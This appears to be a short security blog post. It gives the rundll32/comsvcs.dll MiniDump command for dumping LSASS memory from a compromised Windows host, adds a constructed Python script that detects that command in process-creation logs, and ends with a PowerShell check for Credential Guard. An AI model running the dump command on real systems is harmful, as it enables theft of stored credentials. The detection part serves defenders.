Thursday, June 23, 2022

Pulling LSASS off a hacked box

If you can pull the lsass dump off the box, just use this (624 is the example process ID for lsass; substitute the actual one):

C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
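From the defender's side, the same rundll32/comsvcs.dll MiniDump invocation is what process-creation telemetry (Sysmon Event ID 1, Security 4688) should alert on. The following is an added detection example written for this post, not code from the original author: it scans constructed log lines for a rundll32 call into comsvcs.dll that writes a dump, pulls out the target PID and output path, and rates the finding higher when the PID resolves to lsass.exe in a (constructed) process table. The log format, host names, users and PIDs are all invented for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation log lines in a simplified Sysmon Event ID 1 /
# Security 4688 style; hosts, users and PIDs are invented for this example.
# Field order: timestamp|host|user|image|command line
SAMPLE_EVENTS = [
    "2022-06-23T10:01:02Z|WS01|CORP\\alice|C:\\Windows\\System32\\rundll32.exe|"
    "rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 624 C:\\temp\\lsass.dmp full",
    "2022-06-23T10:01:05Z|WS01|CORP\\alice|C:\\Windows\\System32\\rundll32.exe|"
    "rundll32.exe shell32.dll,Control_RunDLL",
    "2022-06-23T10:02:11Z|WS02|CORP\\bob|C:\\Windows\\System32\\RUNDLL32.EXE|"
    "RUNDLL32.EXE comsvcs.dll,MiniDump 1234 C:\\Users\\Public\\x.dmp full",
    "2022-06-23T10:03:00Z|WS03|NT AUTHORITY\\SYSTEM|C:\\Windows\\System32\\svchost.exe|"
    "svchost.exe -k netsvcs",
]

# Constructed snapshot of running processes (PID -> image name), the kind of
# context a defender would pull from Sysmon/EDR telemetry to resolve the target.
SAMPLE_PROCESS_TABLE = {624: "lsass.exe", 1234: "notepad.exe"}

# comsvcs.dll's MiniDump export takes: <target pid> <output file> <full|mini>
COMSVCS_DUMP_RE = re.compile(
    r"comsvcs\.dll\s*,\s*(?P<export>\S+)\s+(?P<pid>\d+)\s+(?P<path>\S+)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    timestamp: str
    host: str
    user: str
    target_pid: int
    target_image: Optional[str]
    dump_path: str
    severity: str


def scan_events(events, process_table):
    """Return a Finding for every rundll32 -> comsvcs.dll dump seen in events."""
    findings = []
    for line in events:
        ts, host, user, image, cmdline = line.split("|", 4)
        # Only rundll32 can invoke the comsvcs.dll export this way.
        if "rundll32" not in image.lower():
            continue
        m = COMSVCS_DUMP_RE.search(cmdline)
        if not m:
            continue
        export = m.group("export").lower()
        dump_path = m.group("path")
        # Fire on the documented export name, and also on any comsvcs.dll call
        # that writes a .dmp file, so casing/spacing changes alone do not slip by.
        if export != "minidump" and not dump_path.lower().endswith(".dmp"):
            continue
        pid = int(m.group("pid"))
        target = process_table.get(pid)
        # Dumping lsass is a credential-theft indicator; anything else still
        # merits a look but is not the same priority.
        severity = "high" if target and target.lower() == "lsass.exe" else "medium"
        findings.append(Finding(ts, host, user, pid, target, dump_path, severity))
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS, SAMPLE_PROCESS_TABLE):
        print(f"[{f.severity.upper()}] {f.timestamp} {f.host} {f.user}: "
              f"rundll32 comsvcs.dll dump of pid {f.target_pid} "
              f"({f.target_image or 'unknown'}) -> {f.dump_path}")
```

Running it flags the two comsvcs.dll dump events and ignores the benign rundll32 and svchost lines; the lsass case comes out as high severity, the notepad dump as medium. In production you would feed it real 4688/Sysmon records and resolve the PID against the process table captured at the time of the event rather than a static map.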

I know you're trying to avoid PS, but this will tell you if Credential Guard is running (which makes the dump worthless):

powershell "(gcim Win32_DeviceGuard -n root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning"